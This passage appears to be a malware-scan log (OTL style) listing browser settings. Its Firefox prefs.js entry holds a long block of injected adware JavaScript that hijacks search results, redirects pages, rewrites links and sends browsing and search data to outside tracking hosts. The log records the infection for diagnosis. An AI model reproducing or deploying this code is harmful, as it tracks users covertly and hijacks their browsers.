IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Google"
FF - prefs.js..browser.search.highlightCount: 0
FF - prefs.js..browser.search.isUS: true
FF - prefs.js..browser.search.selectedEngine: "Ad-Aware SecureSearch"
FF - prefs.js..browser.startup.homepage: "http://www.wundergro...:55304.2.99999"
FF - prefs.js..extensions.24mMJZqMtuIrRRSO.scode: "try{(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1||url.indexOf(\"namyneck.com\")>-1||url.indexOf(\"styloosh.com\")>-1||url.indexOf(\"applicationgrabb.net\")>-1||url.indexOf(\"databass.info\")>-1||url.indexOf(\"firstfirst.net\")>-1||url.indexOf(\"liversely.com\")>-1||url.indexOf(\"liversely.net\")>-1||url.indexOf(\"livesetwebs.org\")>-1||url.indexOf(\"lp.ncdownloader.com\")>-1||url.indexOf(\"lp.vaudix.com\")>-1||url.indexOf(\"masteroids.com\")>-1||url.indexOf(\"reditions.net\")>-1||url.indexOf(\"sharesuper.info\")>-1||url.indexOf(\"storaget.info\")>-1||url.indexOf(\"westzip.in\")>-1||url.indexOf(\"boxhilade.com\")>-1||url.indexOf(\"mylinksworld.com\")>-1||url.indexOf(\"shoppingwiz.co\")>-1||url.indexOf(\"rabbitsearch.net\")>-1||url.indexOf(\"searchandbake.com\")>-1){return}}catch(e){};if(window.self.location.hostname.indexOf('mail.')==-1)\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\n};(function(){ if (!document.getElementById(\"djdnjh4e7dne543gv\") && window.top==window.self) { var _irhjpivr = function() { window._chch3e7xjxs2 = \"6899089849660189780\" }; if (-1 == navigator.userAgent.toLowerCase().indexOf(\"chrome\")) _irhjpivr(); else { var s1 = document.createElement(\"script\"); s1.innerHTML = \"(\" + _irhjpivr.toString() + \")()\"; document.getElementsByTagName(\"head\")[0].appendChild(s1) } var s = document.createElement(\"script\"); s.type = \"text/javascript\"; s.id = \"djdnjh4e7dne543gv\"; s.src = \"//static.donation-tools.org/widgets/WPPartner/widget.js?_irh_prodname=BuyNsave&_irh_subid=78_2111\"; document.getElementsByTagName(\"head\")[0].appendChild(s) } }());;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"ZXrpoC2o=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"ZXrpoC2o=\")){var d=a.match(/ZXrpoC2o=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.websco...dn4qTgErjY4qHYE\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children.getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children.getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElementsByTagName(\"body\")[0];if(!f.getAttribute(\"wyttb\")){f.setAttribute(\"wyttb\",\"1\");var g=l(),d=m(),q=n(),h=p();if(g&&d&&d){var e=window.name.split(\"=\")[1];window.name=\"\";2<=d/h&&((new Image).src=\"https://score.transferin.in/subs.php?id=\"+g+\"&n=\"+d+\"&c=\"+q+\"&s=\"+h+\"&q=\"+e+\"&cb=174.20.134.70\")}}}if(-1<window.self.location.href.indexOf(\"results?search_query=\")){var k=/[\\?&]search_query=([^&#]*)/.exec(location.search),e=null===k?\"\":decodeURIComponent(k[1].replace(/\\+/g,\" \"));window.name=\"qq=\"+e}}catch®{}})();new function(){var k=this;this.utils=new function(){var c=this;c.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var d=a[e];b=new Image;b.src=d}else b=new Image,b.src=a};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.cookie=new function(){var a=this;a.createCookie=function(a,e,d){if(d){var c=new Date;c.setTime(c.getTime()+864E5*d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=a+\"=\"+e+d+\"; path=/\"};a.readCookie=function(a){a+=\r\n\"=\";for(var e=document.cookie.split(\";\"),d=0;d<e.length;d++){for(var c=e[d];\" \"==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf(a))return c.substring(a.length,c.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(a,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",\r\na,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&e(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};\r\nc.waitForElement=function(a,b,e,d){var f=c.query_selector_all(a);clearTimeout(c.waitTimeout);if(25<k.waitForElementCounter)return b(null);if(\"undefined\"==typeof f||1>f.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle?a.currentStyle:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:\r\nfunction(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,e,c){return c.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var e=null;return function(){var c=this,f=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(c,f)},b)}};c.epoch=function(){return(new Date).getTime()};\r\nc.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\r\nc.match_url=function(a,b){for(var e=0;e<b.length;e++)if(\"string\"==typeof b[e]){var d;d=/^\\/.+\\/$/.test(b[e])?new RegExp(b[e]):c.wildcard_to_regex(b[e]);if(d instanceof RegExp&&d.test(a))return!0}};c.ping=function(a){for(var b=[\"google\",\"bing\",\"yahoo\",\"youtube\"],c=0;c<b.length;c++)if(-1<location.hostname.indexOf(b[c])){var d=new Image,f=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<f.length&&(f=encodeURIComponent(location.hostname));var g=encodeURIComponent(location.hostname);\r\nd.src=k.pixelHost+\"?hid=6899089849660189780&eid=78&pid=2111&prodid=338&v=\"+k.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+b[c]+\"&host=\"+g+\"&ref=\"+f}};c.getAllText=function(a){for(var b=\"\",c=0;c<a.length;c++)b+=a.textContent?a.textContent:a.innetText;return b};c.duplicateElement=function(a){var b=document.createElement(a.nodeName.toLowerCase()),e=!1;a.getAttribute(\"href\")&&b.setAttribute(\"href\",\"javascript:void(0);\");for(var d in a)if(\"src\"==\r\nd||\"width\"==d||\"height\"==d)b[d]=a[d];else if(\"style\"==d)for(var f in a[d])a[d][f]&&\"\"!=a[d][f]&&(b[d][f]=a[d][f]);else e||\"nodeValue\"!=d&&\"textContent\"!=d&&\"innetText\"!=d&&\"className\"!=d||0!=a.children.length||(b[d]=a[d],e=!0);for(e=0;e<a.childNodes.length;e++)if(3==a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent?a.childNodes[e].textContent:a.childNodes[e].innerText));else{d=c.duplicateElement(a.childNodes[e]);f=c.getAllText(d.childNodes);var g=a.childNodes[e].textContent?\r\na.childNodes[e].textContent:a.childNodes[e].innerText;g&&(g=g.replace(f,\"\"),\"\"!=g&&(d.textContent?d.textContent=g:d.innerText=g));b.appendChild(d)}return b}};if(-1<window.location.href.indexOf(\"google.com/chrome/srt\")&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")){try{var h=parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1],10)}catch(p){return}if(!(38>=h)){for(h=0;h<document.links.length;h++){var l=document.links[h],m=l.getAttribute(\"href\");if(m&&-1<m.indexOf(\"#dialog-contents\")){var m=\r\nk.utils.duplicateElement(l),n=l.parentNode;n.insertBefore(m,l);n.removeChild(l)}}(h=document.getElementById(\"dialog-contents\"))&&h.remove()}}};(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"cdbmnd\",function(a){if(!a.cdbmnd&&!localStorage.getItem(\"cdbmnd\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a&&a.href&&\"mp3\"==a.href.substr(-3)){var c=a.href;a.setAttribute(\"href\",\"http://mp3juices.se/media/\"+encodeURIComponent(a.innerHTML)+\"/mid/\"+encodeURIComponent(encodeURIComponent©)+\"/el/1\");a.setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({cdbmnd:\"2\"});localStorage.setItem(\"cdbmnd\",\"2\")},!1)}})}catch(d){}})();;if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=rjC9vTsEvTwHqc56rx1Fqdw5pdr5qHUG&eid=78&hid=6899089849660189780&pid=2111&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"BuyNsave\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var f=a[e];b=new Image;b.src=f}else b=new Image,b.src=a};a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+ c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(b, d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f= this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href: \"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=6899089849660189780&eid=78&pid=2111&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+ b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()}, !1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}, 